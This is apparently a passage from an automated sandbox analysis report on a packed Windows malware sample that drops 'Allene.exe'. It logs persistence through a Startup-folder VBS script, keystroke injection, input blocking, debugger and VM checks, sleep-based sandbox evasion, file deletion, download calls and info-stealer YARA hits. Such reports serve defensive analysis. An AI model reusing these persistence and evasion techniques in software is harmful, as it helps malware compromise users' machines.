                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_009D9A50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect (0_2_009D9A50)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008E848F push FFFFFF8Bh; iretd (0_2_008E8491)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008AE70F push edi; ret (0_2_008AE711)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008AE828 push esi; ret (0_2_008AE82A)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008A8945 push ecx; ret (0_2_008A8958)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008AEAEC push edi; ret (0_2_008AEAEE)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008AEA03 push esi; ret (0_2_008AEA05)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_004567E0 push eax; ret (1_2_004567FE)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00455EAF push ecx; ret (1_2_00455EC2)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00433FF6 push ecx; ret (1_2_00434009)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005DC4C6 push A3005DBAh; retn 005Dh (1_2_005DC50D)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0063848F push FFFFFF8Bh; iretd (1_2_00638491)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005FE70F push edi; ret (1_2_005FE711)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005FE828 push esi; ret (1_2_005FE82A)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005F8945 push ecx; ret (1_2_005F8958)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005FEA03 push esi; ret (1_2_005FEA05)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005FEAEC push edi; ret (1_2_005FEAEE)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005D2F12 push es; retf (1_2_005D2F13)
                Source: initial sample | Static PE information: section name: UPX0
                Source: initial sample | Static PE information: section name: UPX1
                Source: initial sample | Static PE information: section name: UPX0
                Source: initial sample | Static PE information: section name: UPX1
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00406128 ShellExecuteW,URLDownloadToFileW (1_2_00406128)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | File created: C:\Users\user\AppData\Local\Milburr\Allene.exe (dropped file)

                Boot Survival

                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs (dropped file)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle (1_2_00419BC4)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput (0_2_008848D7)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_00905376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed (0_2_00905376)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005D48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput (1_2_005D48D7)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00655376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed (1_2_00655376)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008A3187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (0_2_008A3187)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0040E54F Sleep,ExitProcess,1_2_0040E54F
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,1_2_004198C2
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Window / User API: threadDelayed 9431
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Window / User API: foregroundWindowGot 1745
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | API coverage: 6.3 %
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6180 | Thread sleep count: 189 > 30
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6180 | Thread sleep time: -94500s >= -30000s
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6324 | Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6324 | Thread sleep time: -219000s >= -30000s
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6324 | Thread sleep count: 9431 > 30
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe TID: 6324 | Thread sleep time: -28293000s >= -30000s
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008E445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_008E445A
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EC6D1 FindFirstFileW,FindClose,0_2_008EC6D1
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_008EC75C
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EEF95
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EF0F2
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EF3F3
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E37EF
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E3B12
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EBCBC
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0063445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_0063445A
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0063C6D1 FindFirstFileW,FindClose,1_2_0063C6D1
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0063C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0063C75C
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0063EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0063EF95
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0063F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0063F0F2
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0063F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0063F3F3
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_006337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_006337EF
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00633B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00633B12
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0063BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0063BCBC
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008849A0
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: wscript.exe, 00000003.00000002.1879008239.000002A92EFA5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000003.00000002.1879008239.000002A92EFA5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
Source: wscript.exe, 00000003.00000002.1879008239.000002A92EFA5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Allene.exe, 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008F3F09 BlockInput,0_2_008F3F09
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_00883B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00883B3A
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008B5A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_008B5A7C
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_009D9A50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_009D9A50
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_015FA75E mov eax, dword ptr fs:[00000030h] 0_2_015FA75E
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_015FA770 mov eax, dword ptr fs:[00000030h] 0_2_015FA770
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_015FBDC0 mov eax, dword ptr fs:[00000030h] 0_2_015FBDC0
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_015FBE20 mov eax, dword ptr fs:[00000030h] 0_2_015FBE20
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00442554 mov eax, dword ptr fs:[00000030h] 1_2_00442554
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_010FA6BE mov eax, dword ptr fs:[00000030h] 1_2_010FA6BE
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_010FA6D0 mov eax, dword ptr fs:[00000030h] 1_2_010FA6D0
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_010FBD20 mov eax, dword ptr fs:[00000030h] 1_2_010FBD20
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_010FBD80 mov eax, dword ptr fs:[00000030h] 1_2_010FBD80
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008D80A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,0_2_008D80A9
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008AA124 SetUnhandledExceptionFilter,0_2_008AA124
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008AA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008AA155
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00434168
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A65D
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00433B44
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00433CD7 SetUnhandledExceptionFilter,1_2_00433CD7
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005FA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_005FA155
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_005FA124 SetUnhandledExceptionFilter,1_2_005FA124
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 1_2_00410F36
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008D87B1 LogonUserW,0_2_008D87B1
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_00883B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00883B3A
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008848D7
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008E4C27 mouse_event,0_2_008E4C27
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\AppData\Local\Milburr\Allene.exe"
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008D7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008D7CAF
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008D874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_008D874B
Source: 7056ZCiFdE.exe, 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp, Allene.exe, 00000001.00000002.4155616853.0000000000684000.00000040.00000001.01000000.00000004.sdmp, Allene.exe, 00000004.00000002.1919469392.0000000000684000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0.26:8787
Source: Allene.exe, 00000001.00000002.4156569703.000000000121A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: 7056ZCiFdE.exe, Allene.exe | Binary or memory string: Shell_TrayWnd
Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager05\
Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0.26
Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manageres|
Source: Allene.exe, 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0006689P
Source: Allene.exe, 00000001.00000002.4156569703.000000000121A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerv
Source: Allene.exe, 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager05\7GB
Source: Allene.exe, 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: Allene.exe, 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, logs.dat.1.dr | Binary or memory string: [Program Manager]
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008A862B cpuid 0_2_008A862B
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: EnumSystemLocalesW,1_2_004470AE
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: GetLocaleInfoW,1_2_004510BA
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004511E3
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: GetLocaleInfoW,1_2_004512EA
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_004513B7
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: GetLocaleInfoW,1_2_00447597
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: GetLocaleInfoA,1_2_0040E679
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00450A7F
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: EnumSystemLocalesW,1_2_00450CF7
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: EnumSystemLocalesW,1_2_00450D42
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: EnumSystemLocalesW,1_2_00450DDD
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00450E6A
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008B4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_008B4E87
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008C1E06 GetUserNameW,0_2_008C1E06
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008B3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_008B3F3A
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008849A0
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
